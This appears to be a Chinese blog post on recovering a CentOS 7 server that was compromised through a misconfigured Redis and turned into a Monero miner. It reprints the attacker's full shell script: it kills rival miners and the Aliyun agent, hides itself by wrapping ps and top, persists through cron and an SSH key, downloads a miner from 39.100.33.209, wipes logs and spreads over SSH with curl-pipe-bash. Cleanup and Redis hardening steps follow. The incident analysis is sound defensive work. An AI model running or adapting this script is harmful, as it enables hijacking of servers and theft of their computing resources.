>/etc/svcupdates >/tmp/newsvc.sh >/tmp/svcupdate >/tmp/svcguard >/tmp/svcworkmanager >/tmp/svcupdates chattr +ia /etc/newsvc.sh chattr +ia /etc/svc* chattr +ia /tmp/newsvc.sh chattr +ia /tmp/svc* sleep 1 chattr -i /usr/lib/systemd/systemd-update-daily echo 1 > /usr/lib/systemd/systemd-update-daily chattr +i /usr/lib/systemd/systemd-update-daily #yum install -y docker.io || apt-get install docker.io; docker ps | grep "pocosow" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "gakeaws" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "azulu" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "auto" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "xmr" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "mine" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "slowhttp" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "bash.shell" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "entrypoint.sh" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "/var/sbin/bash" | awk '{print $1}' | xargs -I % docker kill % docker images -a | grep "pocosow" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "gakeaws" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "buster-slim" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "hello-" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "azulu" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "registry" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "xmr" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "auto" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "mine" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "monero" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "slowhttp" | awk '{print $3}' | xargs -I % docker rmi -f % #echo SELINUX=disabled >/etc/selinux/config service apparmor stop systemctl disable apparmor service aliyun.service stop systemctl disable aliyun.service ps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I % kill -9 % rm -rf /usr/local/aegis chattr -R -ia /var/spool/cron chattr -ia /etc/crontab chattr -R -ia /etc/cron.d chattr -R -ia /var/spool/cron/crontabs crontab -r rm -rf /var/spool/cron/* rm -rf /etc/cron.d/* rm -rf /var/spool/cron/crontabs rm -rf /etc/crontab }kill_sus_proc() {ps axf -o "pid"|while read prociddols -l /proc/$procid/exe | grep /tmpif [ $? -ne 1 ]thencat /proc/$procid/cmdline| grep -a -E "zzh"if [ $? -ne 0 ]thenkill -9 $procidelseecho "don't kill"fifidoneps axf -o "pid %cpu" | awk '{if($2>=40.0) print $1}' | while read prociddocat /proc/$procid/cmdline| grep -a -E "zzh"if [ $? -ne 0 ]thenkill -9 $procidelseecho "don't kill"fidone }downloads() {if [ -f "/usr/bin/curl" ]then echo $1,$2http_code=`curl -I -m 50 -o /dev/null -s -w %{http_code} $1`if [ "$http_code" -eq "200" ]thencurl --connect-timeout 100 --retry 100 $1 > $2elif [ "$http_code" -eq "405" ]thencurl --connect-timeout 100 --retry 100 $1 > $2elsecurl --connect-timeout 100 --retry 100 $3 > $2fielif [ -f "/usr/bin/cd1" ]thenhttp_code=`cd1 -I -m 50 -o /dev/null -s -w %{http_code} $1`if [ "$http_code" -eq "200" ]thencd1 --connect-timeout 100 --retry 100 $1 > $2elif [ "$http_code" -eq "405" ]thencd1 --connect-timeout 100 --retry 100 $1 > $2elsecd1 --connect-timeout 100 --retry 100 $3 > $2fielif [ -f "/usr/bin/wget" ]thenwget --timeout=50 --tries=100 -O $2 $1if [ $? -ne 0 ]thenwget --timeout=100 --tries=100 -O $2 $3fielif [ -f "/usr/bin/wd1" ]thenwd1 --timeout=100 --tries=100 -O $2 $1if [ $? -eq 0 ]thenwd1 --timeout=100 --tries=100 -O $2 $3fifi }kill_miner_proc kill_sus_procunlock_cron() {chattr -R -ia /var/spool/cronchattr -ia /etc/crontabchattr -R -ia /var/spool/cron/crontabschattr -R -ia /etc/cron.d }lock_cron() {chattr -R +ia /var/spool/cronchattr +ia /etc/crontabchattr -R +ia /var/spool/cron/crontabschattr -R +ia /etc/cron.d }if [ -f "$rtdir" ] thenecho "i am root"mkdir -p /root/.sshecho "goto 1" >> /etc/zzhschattr -ia /etc/zzh*chattr -ia/etc/config.json*chattr -ia /etc/newinit.sh*chattr -ia /root/.ssh/authorized_keys*chattr -R -ia /root/.sshif [ -f "/bin/ps.original" ]thenecho "/bin/ps changed"elsemv /bin/ps /bin/ps.original echo "#! /bin/bash">>/bin/psecho "ps.original \$@ | grep -v \"zzh\|pnscan\"">>/bin/pschmod +x /bin/pstouch -d 20160825 /bin/psecho "/bin/ps changing"fiif [ -f "/bin/top.original" ]thenecho "/bin/top changed"elsemv /bin/top /bin/top.original echo "#! /bin/bash">>/bin/topecho "top.original \$@ | grep -v \"zzh\|pnscan\"">>/bin/topchmod +x /bin/toptouch -d 20160825 /bin/topecho "/bin/top changing"fiif [ -f "/bin/pstree.original" ]thenecho "/bin/pstree changed"elsemv /bin/pstree /bin/pstree.original echo "#! /bin/bash">>/bin/pstreeecho "pstree.original \$@ | grep -v \"zzh\|pnscan\"">>/bin/pstreechmod +x /bin/pstreetouch -d 20160825 /bin/pstreeecho "/bin/pstree changing"fiif [ -f "/bin/chattr" ]thenchattrsize=`ls -l /bin/chattr | awk '{ print $5 }'`if [ "$chattrsize" -lt "$chattr_size" ]thenyum -y remove e2fsprogsyum -y install e2fsprogselseecho "no need install chattr"fielseyum -y remove e2fsprogsyum -y install e2fsprogsfiunlock_cronrm -f ${crondir}rm -f /etc/cron.d/zzhrm -f /etc/crontabecho "*/30 * * * * sh /etc/newinit.sh >/dev/null 2>&1" >> ${crondir}echo "*/40 * * * * root sh /etc/newinit.sh >/dev/null 2>&1" >> /etc/cron.d/zzhecho "0 1 * * * root sh /etc/newinit.sh >/dev/null 2>&1" >> /etc/crontabecho crontab createdlock_cronchmod 700 /root/.ssh/echo >> /root/.ssh/authorized_keyschmod 600 /root/.ssh/authorized_keysecho "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCmEFN80ELqVV9enSOn+05vOhtmmtuEoPFhompw+bTIaCDsU5Yn2yD77Yifc/yXh3O9mg76THr7vxomguO040VwQYf9+vtJ6CGtl7NamxT8LYFBgsgtJ9H48R9k6H0rqK5Srdb44PGtptZR7USzjb02EUq/15cZtfWnjP9pKTgscOvU6o1Jpos6kdlbwzNggdNrHxKqps0so3GC7tXv/GFlLVWEqJRqAVDOxK4Gl2iozqxJMO2d7TCNg7d3Rr3w4xIMNZm49DPzTWQcze5XciQyNoNvaopvp+UlceetnWxI1Kdswi0VNMZZOmhmsMAtirB3yR10DwH3NbEKy+ohYqBL root@puppetserver" > /root/.ssh/authorized_keyscd1 http://39.100.33.209/b2f628/call.txtwget -q -O- http://39.100.33.209/b2f628/call.txtcd1 http://39.100.33.209/b2f628/call.txtwget -q -O- http://39.100.33.209/b2f628/call.txtcfg="/etc/config.json"file="/etc/zzh"if [-f "/etc/config.json" ]thenfilesize_config=`ls -l /etc/config.json | awk '{ print $5 }'`if [ "$filesize_config" -ne "$config_size" ] thenpkill -f zzhrm /etc/config.jsondownloads $config_url /etc/config.json $config_url_backupelseecho "no need download"fielsedownloads $config_url /etc/config.json $config_url_backupfiif [ -f "/etc/zzh" ]thenfilesize1=`ls -l /etc/zzh | awk '{ print $5 }'`if [ "$filesize1" -ne "$miner_size" ] thenpkill -f zzhrm /etc/zzhdownloads $miner_url /etc/zzh $miner_url_backupelseecho "not need download"fielsedownloads $miner_url /etc/zzh $miner_url_backupfidownloads $sh_url /etc/newinit.sh $sh_url_backupchmod 777 /etc/zzhif [ -f "/bin/ps.original" ]thenps.original -fe|grep zzh |grep -v grepelseps -fe|grep zzh |grep -v grepfiif [ $? -ne 0 ]thencd /etcecho "not root runing"sleep 5scpunum=`cat /proc/cpuinfo |grep -i model|grep name|wc -l` if (("$cpunum"<=2 )); thencpunum=1echo $cpunum elif (("$cpunum"<=4)); thencpunum=2echo $cpunum elif (("$cpunum"<=8)); thencpunum=4echo $cpunum elif (("$cpunum"<=16)); thencpunum=8echo $cpunum elif (("$cpunum"<=32)); thencpunum=16echo $cpunum elif (("$cpunum"<=64)); thencpunum=32echo $cpunum elif (("$cpunum">64)); thencpunum=50echo $cpunum elseecho other fi./zzh -B --log-file=/etc/etc --coin=monero -o stratum+tcp://xmr-asia1.nanopool.org:14444 --threads=$cpunum -u 43Xbgtym2GZWBk87XiYbCpTKGPBTxYZZWi44SWrkqqvzPZV6Pfmjv3UHR6FDwvPgePJyv9N5PepeajfmKp1X71EW7jx4Tpz -p x &elseecho "root runing....."fichmod 777 /etc/zzhchattr +ia /etc/zzhchmod 777 /etc/config.jsonchattr +ia /etc/config.jsonchmod 777 /etc/newinit.shchattr +ia /etc/newinit.shchmod 600 /root/.ssh/authorized_keyschattr +ia /root/.ssh/authorized_keys elseecho "goto 1" > /tmp/zzhschattr -ia /tmp/zzh*chattr -ia /tmp/config.json*chattr -ia /tmp/newinit.sh*if [ ! -f "/usr/bin/crontab" ]thenunlock_cronecho "*/30 * * * * sh /tmp/newinit.sh >/dev/null 2>&1" >> ${crondir}lock_cronelseunlock_cron[[ $cont =~ "newinit.sh" ]] || (crontab -l ; echo "*/30 * * * * sh /tmp/newinit.sh >/dev/null 2>&1") | crontab -lock_cronfiif [ -f "/tmp/config.json" ]thenfilesize1=`ls -l /tmp/config.json | awk '{ print $5 }'`if [ "$filesize1" -ne "$config_size" ]thenpkill -f zzhrm /tmp/config.jsondownloads $config_url /tmp/config.json $config_url_backupelseecho "no need download"fielsedownloads $config_url /tmp/config.json $config_url_backupfiif [ -f "/tmp/zzh" ]then filesize1=`ls -l /tmp/zzh | awk '{ print $5 }'`if [ "$filesize1" -ne "$miner_size" ] thenpkill -f zzhrm /tmp/zzhdownloads $miner_url /tmp/zzh $miner_url_backupelseecho "no need download"fielsedownloads $miner_url /tmp/zzh $miner_url_backupfiecho "i am here"downloads $sh_url /tmp/newinit.sh $sh_url_backupps -fe|grep zzh |grep -v grepif [ $? -ne 0 ]thenecho "not tmp runing"cd /tmpchmod 777 zzhsleep 5scpunum=`cat /proc/cpuinfo |grep -i model|grep name|wc -l` if (("$cpunum"<=2 )); thencpunum=1echo $cpunum elif (("$cpunum"<=4)); thencpunum=2echo $cpunum elif (("$cpunum"<=8)); thencpunum=4echo $cpunum elif (("$cpunum"<=16)); thencpunum=8echo $cpunum elif (("$cpunum"<=32)); thencpunum=16echo $cpunum elif (("$cpunum"<=64)); thencpunum=32echo $cpunum elif (("$cpunum">64)); thencpunum=50echo $cpunum else echo other fi./zzh -B --log-file=/etc/etc --coin=monero -o stratum+tcp://xmr-asia1.nanopool.org:14444 --threads=$cpunum -u 43Xbgtym2GZWBk87XiYbCpTKGPBTxYZZWi44SWrkqqvzPZV6Pfmjv3UHR6FDwvPgePJyv9N5PepeajfmKp1X71EW7jx4Tpz -p x &elseecho "tmp runing....."fichmod 777 /tmp/zzhchattr +i /tmp/zzhchmod 777 /tmp/newinit.shchattr +i /tmp/newinit.shchmod 777 /tmp/config.jsonchattr +i /tmp/config.jsonfiiptables -F iptables -X iptables -A OUTPUT -p tcp --dport 5555 -j DROP iptables -A OUTPUT -p tcp --dport 7777 -j DROP iptables -A OUTPUT -p tcp --dport 9999 -j DROP iptables -A OUTPUT -p tcp --dport 9999 -j DROP service iptables reload ps auxf|grep -v grep|grep -v 43Xbgtym2GZWBk87XiYbCpTKGPBTxY|grep "stratum"|awk '{print $2}'|xargs kill -9 history -c echo > /var/spool/mail/root echo > /var/log/wtmp echo > /var/log/secure echo > /root/.bash_historyyum install -y bash 2>/dev/null apt install -y bash 2>/dev/null apt-get install -y bash 2>/dev/null if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; thenfor h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'curl -o- http://39.100.33.209/b2f628fff19fda999999999/is.sh | bash >/dev/null 2>&1 &' & done fi if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; thenfor h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'cd1 -o- http://39.100.33.209/b2f628fff19fda999999999/is.sh | bash >/dev/null 2>&1 &' & done fi echo "$bbdir" echo "$bbdira"$bbdir -fsSL http://39.100.33.209/b2f628fff19fda999999999/is.sh | bash $bbdira -fsSL http://39.100.33.209/b2f628fff19fda999999999/is.sh | bash關閉Linux子系統
?修改命令目錄
查找阿里云相關服務,停止進程(停止后控制臺無法使用云助手)?
寫入公鑰,實現免密登錄
?下載挖礦配置文件
為相關文件加入隱藏屬性及執行權限
清空服務器原有防火墻規則
?
解決方案
1.首先使用top命令排查系統中占用率極高的進程
一般挖礦腳本在啟動后,會極度消耗CPU資源,使用top命令查看服務器中啟動的進程。(此處因已結束相關進程,未見異常。)
top2.停止異常進程
kill -9 {進程號}3.刪除ssh下生成的異常公鑰
3.1 查看異常公鑰
3.2 去除文件隱藏屬性
查看文件隱藏屬性
lsattr {文件名}去除隱藏屬性(需要去除哪個屬性就加上對應的參數)
chattr -iae?
3.3 刪除公鑰
4.刪除定時任務
4.1查看定時任務
4.2去除文件隱藏屬性
定時任務刪除可使用如下命令
crontab -r或者直接刪除/var/spool/cron/{用戶名} 文件?
此時直接刪除會提示無權限(root權限提示我無權限?文件的隱藏屬性)
使用chattr命令后再進行刪除
4.3刪除文件
rm /var/spool/cron/root5.crontab日志文件分析
5.1 查看日志文件
cat /var/log/cron? 分析可知etc目錄下仍存在定時腳本
?
5.2 查看相關腳本
5.3刪除可疑文件
6.清理緩存殘留
6.1去除隱藏屬性
6.2?刪除緩存文件
rm -rf /tmp/?7.相關配置文件刪除
刪除挖礦配置文件config.json、newsvc.sh zzh zzhs
8.設置安全組,禁止惡意ip訪問
通過域名查找IP地址
添加安全組出方向規則?
?
9.恢復被修改的命令
mv /usr/bin/url /usr/bin/curl mv /usr/bin/cd1 /usr/bin/url mv /usr/bin/get /usr/bin/wget mv /usr/bin/wd1 /usr/bin/get mv /bin/ps.original /bin/ps mv /bin/top.original /bin/top mv /bin/pstree.original /bin/pstree?10.防范措施
新增普通用戶,禁止遠程登錄,以此用戶啟動Redis服務。
修改redis.conf文件中的bind 127.0.0.1為為自己數據庫要訪問的地址
bind x.x.x.x在redis.conf中新增requirepass字段
requirepass {復雜密碼}?
總結
以上是生活随笔為你收集整理的记一次CentOS7因Redis配置不当导致被Root提权沦为矿机修复过程的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 图灵学院Java架构师五期笔记
- 下一篇: taro小程序 函数组件实现分享功能